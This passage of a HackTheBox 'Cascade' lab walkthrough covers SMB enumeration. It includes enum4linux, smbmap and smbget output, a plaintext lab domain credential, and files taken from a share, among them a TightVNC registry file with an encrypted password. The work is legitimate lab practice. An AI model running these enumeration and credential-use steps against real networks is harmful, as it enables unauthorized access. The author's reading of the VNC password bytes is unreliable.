SMB
Nmap discovered a SMB service on the target port 139 and 445
Null Session
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ smbclient -L //casc-dc1.cascade.local/
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to casc-dc1.cascade.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availableWhile the target SMB service allows anonymous access, lack of privileges prevents me to enumerate the shares within
enum4linux
┌──(kali㉿kali)-[~/archive/htb/labs/cascade]
└─$ enum4linux -a -r -o -n -A -U $IP
starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Jun 26 04:28:22 2023
=========================================( Target Information )=========================================
Target ........... 10.10.10.182
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.10.182 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.10.10.182 )================================
Looking up status of 10.10.10.182
No reply from 10.10.10.182
===================================( Session Check on 10.10.10.182 )===================================
[+] Server 10.10.10.182 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.10.182 )================================
domain name: CASCADE
domain sid: S-1-5-21-3332504370-1206983947-1165150453
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.10.10.182 )===================================
[E] Can't get OS info with smbclient
[+] got os info for 10.10.10.182 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
=======================================( Users on 10.10.10.182 )=======================================
index: 0xee0 RID: 0x464 acb: 0x00000214 Account: a.turnbull Name: Adrian Turnbull Desc: (null)
index: 0xebc RID: 0x452 acb: 0x00000210 Account: arksvc Name: ArkSvc Desc: (null)
index: 0xee4 RID: 0x468 acb: 0x00000211 Account: b.hanson Name: Ben Hanson Desc: (null)
index: 0xee7 RID: 0x46a acb: 0x00000210 Account: BackupSvc Name: BackupSvc Desc: (null)
index: 0xdeb RID: 0x1f5 acb: 0x00000215 Account: CascGuest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xee5 RID: 0x469 acb: 0x00000210 Account: d.burman Name: David Burman Desc: (null)
index: 0xee3 RID: 0x467 acb: 0x00000211 Account: e.crowe Name: Edward Crowe Desc: (null)
index: 0xeec RID: 0x46f acb: 0x00000211 Account: i.croft Name: Ian Croft Desc: (null)
index: 0xeeb RID: 0x46e acb: 0x00000210 Account: j.allen Name: Joseph Allen Desc: (null)
index: 0xede RID: 0x462 acb: 0x00000210 Account: j.goodhand Name: John Goodhand Desc: (null)
index: 0xed7 RID: 0x45c acb: 0x00000210 Account: j.wakefield Name: James Wakefield Desc: (null)
index: 0xeca RID: 0x455 acb: 0x00000210 Account: r.thompson Name: Ryan Thompson Desc: (null)
index: 0xedd RID: 0x461 acb: 0x00000210 Account: s.hickson Name: Stephanie Hickson Desc: (null)
index: 0xebd RID: 0x453 acb: 0x00000210 Account: s.smith Name: Steve Smith Desc: (null)
index: 0xed2 RID: 0x457 acb: 0x00000210 Account: util Name: Util Desc: (null)
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
=================================( Share Enumeration on 10.10.10.182 )=================================
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.10.10.182
============================( Password Policy Information for 10.10.10.182 )============================
[+] Attaching to 10.10.10.182 using a NULL share
[+] Trying protocol 139/SMB...
[!] protocol failed: Cannot request session (Called Name:10.10.10.182)
[+] Trying protocol 445/SMB...
[+] found domain(s):
[+] CASCADE
[+] Builtin
[+] password info for domain: CASCADE
[+] minimum password length: 5
[+] password history length: None
[+] maximum password age: Not Set
[+] password complexity flags: 000000
[+] domain refuse password change: 0
[+] domain password store cleartext: 0
[+] domain password lockout admins: 0
[+] domain password no clear change: 0
[+] domain password no anon change: 0
[+] domain password complex: 0
[+] minimum password age: None
[+] reset account lockout counter: 30 minutes
[+] locked account duration: 30 minutes
[+] account lockout threshold: None
[+] forced log off time: Not Set
[+] retieved partial password policy with rpcclient:
password complexity: Disabled
minimum password length: 5
=======================================( Groups on 10.10.10.182 )=======================================
[+] getting builtin groups:
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
[+] getting builtin group memberships:
group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
group: Users' (RID: 545) has member: CASCADE\Domain Users
group: Guests' (RID: 546) has member: CASCADE\CascGuest
group: Guests' (RID: 546) has member: CASCADE\Domain Guests
[+] getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44e]
group:[IT] rid:[0x459]
group:[Production] rid:[0x45a]
group:[HR] rid:[0x45b]
group:[AD Recycle Bin] rid:[0x45f]
group:[Backup] rid:[0x460]
group:[Temps] rid:[0x463]
group:[WinRMRemoteWMIUsers__] rid:[0x465]
group:[Remote Management Users] rid:[0x466]
group:[Factory] rid:[0x46c]
group:[Finance] rid:[0x46d]
group:[Audit Share] rid:[0x471]
group:[Data Share] rid:[0x472]
[+] getting local group memberships:
group: HR' (RID: 1115) has member: CASCADE\s.hickson
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\krbtgt
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Controllers
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Schema Admins
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Enterprise Admins
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Cert Publishers
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Domain Admins
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Group Policy Creator Owners
group: Denied RODC Password Replication Group' (RID: 572) has member: CASCADE\Read-only Domain Controllers
group: IT' (RID: 1113) has member: CASCADE\arksvc
group: IT' (RID: 1113) has member: CASCADE\s.smith
group: IT' (RID: 1113) has member: CASCADE\r.thompson
group: Remote Management Users' (RID: 1126) has member: CASCADE\arksvc
group: Remote Management Users' (RID: 1126) has member: CASCADE\s.smith
group: Audit Share' (RID: 1137) has member: CASCADE\s.smith
group: Data Share' (RID: 1138) has member: CASCADE\Domain Users
group: AD Recycle Bin' (RID: 1119) has member: CASCADE\arksvc
[+] getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[DnsUpdateProxy] rid:[0x44f]
[+] getting domain group memberships:
group: 'Group Policy Creator Owners' (RID: 520) has member: CASCADE\administrator
group: 'Domain Guests' (RID: 514) has member: CASCADE\CascGuest
group: 'Domain Users' (RID: 513) has member: CASCADE\administrator
group: 'Domain Users' (RID: 513) has member: CASCADE\krbtgt
group: 'Domain Users' (RID: 513) has member: CASCADE\arksvc
group: 'Domain Users' (RID: 513) has member: CASCADE\s.smith
group: 'Domain Users' (RID: 513) has member: CASCADE\r.thompson
group: 'Domain Users' (RID: 513) has member: CASCADE\util
group: 'Domain Users' (RID: 513) has member: CASCADE\j.wakefield
group: 'Domain Users' (RID: 513) has member: CASCADE\s.hickson
group: 'Domain Users' (RID: 513) has member: CASCADE\j.goodhand
group: 'Domain Users' (RID: 513) has member: CASCADE\a.turnbull
group: 'Domain Users' (RID: 513) has member: CASCADE\e.crowe
group: 'Domain Users' (RID: 513) has member: CASCADE\b.hanson
group: 'Domain Users' (RID: 513) has member: CASCADE\d.burman
group: 'Domain Users' (RID: 513) has member: CASCADE\BackupSvc
group: 'Domain Users' (RID: 513) has member: CASCADE\j.allen
group: 'Domain Users' (RID: 513) has member: CASCADE\i.croft
==================( users on 10.10.10.182 via rid cycling (rids: 500-550,1000-1050) )==================
[i] found new sid:
S-1-5-21-3332504370-1206983947-1165150453
[i] found new sid:
S-1-5-21-2189247330-517467924-712900258
[+] Enumerating users using SID S-1-5-21-2189247330-517467924-712900258 and logon username '', password ''
S-1-5-21-2189247330-517467924-712900258-500 CASC-DC1\Administrator (Local User)
S-1-5-21-2189247330-517467924-712900258-501 CASC-DC1\Guest (Local User)
S-1-5-21-2189247330-517467924-712900258-513 CASC-DC1\None (Domain Group)
[+] Enumerating users using SID S-1-5-21-3332504370-1206983947-1165150453 and logon username '', password ''
S-1-5-21-3332504370-1206983947-1165150453-500 CASCADE\administrator (Local User)
S-1-5-21-3332504370-1206983947-1165150453-501 CASCADE\CascGuest (Local User)
S-1-5-21-3332504370-1206983947-1165150453-502 CASCADE\krbtgt (Local User)
S-1-5-21-3332504370-1206983947-1165150453-512 CASCADE\Domain Admins (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-513 CASCADE\Domain Users (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-514 CASCADE\Domain Guests (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-515 CASCADE\Domain Computers (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-516 CASCADE\Domain Controllers (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-517 CASCADE\Cert Publishers (Local Group)
S-1-5-21-3332504370-1206983947-1165150453-518 CASCADE\Schema Admins (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-519 CASCADE\Enterprise Admins (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-520 CASCADE\Group Policy Creator Owners (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-521 CASCADE\Read-only Domain Controllers (Domain Group)
S-1-5-21-3332504370-1206983947-1165150453-1001 CASCADE\CASC-DC1$ (Local User)
===============================( Getting printer info for 10.10.10.182 )===============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on mon jun 26 04:34:49 2023enum4linux enumerated a set of information regarding the target domain, including the domain users, group, and membership Some of thata information were already identified during the MSRPC enumeration
r.thompson Session
With the valid domain credential, I should now be able to enumerate the target SMB server
┌──(kali㉿kali)-[~/…/htb/labs/cascade/smb]
└─$ smbmap -H CASC-DC1.CASCADE.LOCAL -u 'r.thompson' -p 'rY4n5eva'
[+] IP: 10.10.10.182:445 Name: cascade.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share 2 none default shares available; Audit$ and Data
The current user has read access to the Data share
┌──(kali㉿kali)-[~/…/htb/labs/cascade/smb]
└─$ smbmap -H casc-dc1.cascade.local -u 'r.thompson' -p 'rY4n5eva' -R Data
[+] IP: CASC-DC1.CASCADE.LOCAL:445 Name: unknown
Disk Permissions Comment
---- ----------- -------
Data READ ONLY
.\Data\*
dr--r--r-- 0 Tue Jan 28 23:05:51 2020 .
dr--r--r-- 0 Tue Jan 28 23:05:51 2020 ..
dr--r--r-- 0 Mon Jan 13 02:45:14 2020 Contractors
dr--r--r-- 0 Mon Jan 13 02:45:10 2020 Finance
dr--r--r-- 0 Tue Jan 28 19:04:51 2020 IT
dr--r--r-- 0 Mon Jan 13 02:45:20 2020 Production
dr--r--r-- 0 Mon Jan 13 02:45:16 2020 Temps
.\Data\IT\*
dr--r--r-- 0 Tue Jan 28 19:04:51 2020 .
dr--r--r-- 0 Tue Jan 28 19:04:51 2020 ..
dr--r--r-- 0 Tue Jan 28 19:00:30 2020 Email Archives
dr--r--r-- 0 Tue Jan 28 19:04:51 2020 LogonAudit
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 Logs
dr--r--r-- 0 Tue Jan 28 23:06:59 2020 Temp
.\Data\IT\Email Archives\*
dr--r--r-- 0 Tue Jan 28 19:00:30 2020 .
dr--r--r-- 0 Tue Jan 28 19:00:30 2020 ..
fr--r--r-- 2522 Tue Jan 28 19:00:30 2020 Meeting_Notes_June_2018.html
.\Data\IT\Logs\*
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 .
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 ..
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 Ark AD Recycle Bin
dr--r--r-- 0 Wed Jan 29 01:56:00 2020 DCs
.\Data\IT\Logs\Ark AD Recycle Bin\*
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 .
dr--r--r-- 0 Wed Jan 29 01:53:04 2020 ..
fr--r--r-- 1303 Wed Jan 29 02:19:11 2020 ArkAdRecycleBin.log
.\Data\IT\Logs\DCs\*
dr--r--r-- 0 Wed Jan 29 01:56:00 2020 .
dr--r--r-- 0 Wed Jan 29 01:56:00 2020 ..
fr--r--r-- 5967 Sun Jan 26 23:22:05 2020 dcdiag.log
.\Data\IT\Temp\*
dr--r--r-- 0 Tue Jan 28 23:06:59 2020 .
dr--r--r-- 0 Tue Jan 28 23:06:59 2020 ..
dr--r--r-- 0 Tue Jan 28 23:06:55 2020 r.thompson
dr--r--r-- 0 Tue Jan 28 21:00:05 2020 s.smith
.\Data\IT\Temp\s.smith\*
dr--r--r-- 0 Tue Jan 28 21:00:05 2020 .
dr--r--r-- 0 Tue Jan 28 21:00:05 2020 ..
fr--r--r-- 2680 Tue Jan 28 21:00:01 2020 VNC Install.regThere seems to be a lot here in the IT directory
┌──(kali㉿kali)-[~/…/htb/labs/cascade/smb]
└─$ smbget smb://casc-dc1.cascade.local/Data/IT -U 'r.thompson%rY4n5eva' -e -R
Using workgroup WORKGROUP, user r.thompson
Encryption required and server doesn't support SMB3 encryption - failing connect
smb://casc-dc1.cascade.local/Data/IT/Email Archives/Meeting_Notes_June_2018.html
smb://casc-dc1.cascade.local/Data/IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log
smb://casc-dc1.cascade.local/Data/IT/Logs/DCs/dcdiag.log
smb://casc-dc1.cascade.local/Data/IT/Temp/s.smith/VNC Install.reg
Downloaded 12.18kB in 7 secondsDownloading the entire edirectory I will go one by one
\\casc-dc1.cascade.local\Data\IT\Email Archives\Meeting_Notes_June_2018.html
┌──(kali㉿kali)-[~/…/labs/cascade/smb/Email Archives]
└─$ cat Meeting_Notes_June_2018.html | html2text
from: Steve Smith
to: IT (Internal)
sent: 14 June 2018 14:07
subject: Meeting Notes
For anyone that missed yesterdays meeting (Im looking at you Ben). Main
points are below:
-- New production network will be going live on Wednesday so keep an eye out
for any issues.
-- We will be using a temporary account to perform all tasks related to the
network migration and this account will be deleted at the end of 2018 once the
migration is complete. This will allow us to identify actions related to the
migration in security logs etc. Username is TempAdmin (password is the same as
the normal admin account password).
-- The winner of the Best GPO competition will be announced on Friday so get
your submissions in soon.
SteveThe HTML file appears to be a mail by Steve (likely the s.smith user), reminding the team of the yesterday’s meeting;
- New production network going LIVE soon
- A temporary account;
TempAdmin, for migration task handling- password is the same as the “normal” admin account password
- The best GPO competition
While the information above is rather out of the context, I’ll keep that in mind
\\casc-dc1.cascade.local\Data\IT\Logs
┌──(kali㉿kali)-[~/…/labs/cascade/smb/Logs]
└─$ tree
.
├── Ark AD Recycle Bin
│ └── ArkAdRecycleBin.log
└── DCs
└── dcdiag.log
3 directories, 2 filesThe \\casc-dc1.cascade.local\Data\IT\Logs directory contains 2 sub-directories with a logs file within
\\casc-dc1.cascade.local\Data\IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log
┌──(kali㉿kali)-[~/…/labs/cascade/smb/Logs]
└─$ cat Ark\ AD\ Recycle\ Bin/ArkAdRecycleBin.log
1/10/2018 15:43 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
1/10/2018 15:43 [MAIN_THREAD] Validating settings...
1/10/2018 15:43 [MAIN_THREAD] Error: Access is denied
1/10/2018 15:43 [MAIN_THREAD] Exiting with error code 5
2/10/2018 15:56 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
2/10/2018 15:56 [MAIN_THREAD] Validating settings...
2/10/2018 15:56 [MAIN_THREAD] Running as user CASCADE\ArkSvc
2/10/2018 15:56 [MAIN_THREAD] Moving object to AD recycle bin CN=Test,OU=Users,OU=UK,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Successfully moved object. New location CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
2/10/2018 15:56 [MAIN_THREAD] Exiting with error code 0
8/12/2018 12:22 [MAIN_THREAD] ** STARTING - ARK AD RECYCLE BIN MANAGER v1.2.2 **
8/12/2018 12:22 [MAIN_THREAD] Validating settings...
8/12/2018 12:22 [MAIN_THREAD] Running as user CASCADE\ArkSvc
8/12/2018 12:22 [MAIN_THREAD] Moving object to AD recycle bin CN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Successfully moved object. New location CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
8/12/2018 12:22 [MAIN_THREAD] Exiting with error code 0this appears to be a log file for a custom application implementing the ad recycle bin
According to the log, it’s using version 1.2.2
The log file appears to have recorded the deletion of 2 following AD objects;
CN=Test,OU=Users,OU=UK,DC=cascade,DC=localCN=TempAdmin,OU=Users,OU=UK,DC=cascade,DC=local
Those were performed as the ArkSvc user
Based on the context, the CN=Test,OU=Users,OU=UK,DC=cascade,DC=local object must have been for a test run since it was way before the network migration mentioned in the mail abave. Additionally, the latter specifically points out about the mentioned account, TempAdmin
Those 2 objects are no longer available
\\casc-dc1.cascade.local\Data\IT\Logs\DCs\dcdiag.log
┌──(kali㉿kali)-[~/…/labs/cascade/smb/Logs]
└─$ cat DCs/dcdiag.log
Directory Server Diagnosis
Performing initial setup:
Trying to find home server...
Home Server = CASC-DC1
* Identified AD Forest.
Done gathering initial info.
Doing initial required tests
Testing server: Default-First-Site-Name\CASC-DC1
Starting test: Connectivity
......................... CASC-DC1 passed test Connectivity
Doing primary tests
Testing server: Default-First-Site-Name\CASC-DC1
Starting test: Advertising
......................... CASC-DC1 passed test Advertising
Starting test: FrsEvent
......................... CASC-DC1 passed test FrsEvent
Starting test: DFSREvent
......................... CASC-DC1 passed test DFSREvent
Starting test: SysVolCheck
......................... CASC-DC1 passed test SysVolCheck
Starting test: KccEvent
......................... CASC-DC1 passed test KccEvent
Starting test: KnowsOfRoleHolders
......................... CASC-DC1 passed test KnowsOfRoleHolders
Starting test: MachineAccount
......................... CASC-DC1 passed test MachineAccount
Starting test: NCSecDesc
......................... CASC-DC1 passed test NCSecDesc
Starting test: NetLogons
......................... CASC-DC1 passed test NetLogons
Starting test: ObjectsReplicated
......................... CASC-DC1 passed test ObjectsReplicated
Starting test: Replications
......................... CASC-DC1 passed test Replications
Starting test: RidManager
......................... CASC-DC1 passed test RidManager
Starting test: Services
......................... CASC-DC1 passed test Services
Starting test: SystemLog
A warning event occurred. EventID: 0x8000001D
Time Generated: 01/10/2020 15:48:14
Event String:
The Key Distribution Center (KDC) cannot find a suitable certificate to use for smart card logons, or the KDC certificate could not be verified. Smart card logon may not function correctly if this problem is not resolved. To correct this problem, either verify the existing KDC certificate using certutil.exe or enroll for a new KDC certificate.
An error event occurred. EventID: 0xC00038D6
Time Generated: 01/10/2020 15:48:43
Event String:
The DFS Namespace service could not initialize cross forest trust information on this domain controller, but it will periodically retry the operation. The return code is in the record data.
A warning event occurred. EventID: 0x000003F6
Time Generated: 01/10/2020 15:48:43
Event String:
Name resolution for the name _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.cascade.local timed out after none of the configured DNS servers responded.
A warning event occurred. EventID: 0x0000000C
Time Generated: 01/10/2020 15:48:43
Event String:
Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the AD PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the AD PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.
A warning event occurred. EventID: 0x000727AA
Time Generated: 01/10/2020 15:50:52
Event String:
The WinRM service failed to create the following SPNs: WSMAN/CASC-DC1.cascade.local; WSMAN/CASC-DC1.
......................... CASC-DC1 failed test SystemLog
Starting test: VerifyReferences
......................... CASC-DC1 passed test VerifyReferences
Running partition tests on : ForestDnsZones
Starting test: CheckSDRefDom
......................... ForestDnsZones passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... ForestDnsZones passed test
CrossRefValidation
Running partition tests on : DomainDnsZones
Starting test: CheckSDRefDom
......................... DomainDnsZones passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... DomainDnsZones passed test
CrossRefValidation
Running partition tests on : Schema
Starting test: CheckSDRefDom
......................... Schema passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... Schema passed test CrossRefValidation
Running partition tests on : Configuration
Starting test: CheckSDRefDom
......................... Configuration passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... Configuration passed test CrossRefValidation
Running partition tests on : cascade
Starting test: CheckSDRefDom
......................... cascade passed test CheckSDRefDom
Starting test: CrossRefValidation
......................... cascade passed test CrossRefValidation
Running enterprise tests on : cascade.local
Starting test: LocatorCheck
......................... cascade.local passed test LocatorCheck
Starting test: Intersite
......................... cascade.local passed test IntersiteThis appears to be a log file for dcdiag
DCDiag is a command-line tool used in Windows Server to diagnose and test the health of Domain Controllers in an Active Directory environment. It helps identify issues with DNS configuration, replication, trust relationships, and security settings. By running DCDiag, administrators can gather important information about the state of their Active Directory infrastructure. The tool performs tests such as connectivity, DNS, replication, and trust relationship tests, providing a detailed report to aid in troubleshooting and resolving any detected problems.
\\casc-dc1.cascade.local\Data\IT\Temp
┌──(kali㉿kali)-[~/…/htb/labs/cascade/smb]
└─$ tree Temp
Temp
├── r.thompson
└── s.smith
└── VNC Install.reg
3 directories, 1 fileThe \\casc-dc1.cascade.local\Data\IT\Temp directory contains 2 sub-directories named after 2 users; r.thompson and s.smith
It appears that the registry file is for VNC installation
\\casc-dc1.cascade.local\Data\IT\Temp\s.smith\VNC Install.reg
┌──(kali㉿kali)-[~/…/htb/labs/cascade/smb]
└─$ cat Temp/s.smith/VNC\ Install.reg
��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"RunControlInterface"=dword:00000001
"IdleTimeout"=dword:00000000
"VideoClasses"=""
"VideoRects"=""The registry file contains a pre-configured registry set for a TightVNC instance
While the majority of registry keys above are configured in the binary format, some of them are set in the hexadecimal format. They are the following;
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"PollingInterval"=dword:000003e8
"VideoRecognitionInterval"=dword:00000bb8
The VNC service is configured to be listening on the port 5800 and 5900.
The converted password is k�*KnZ�
I will go further into this in the dedicated VNC section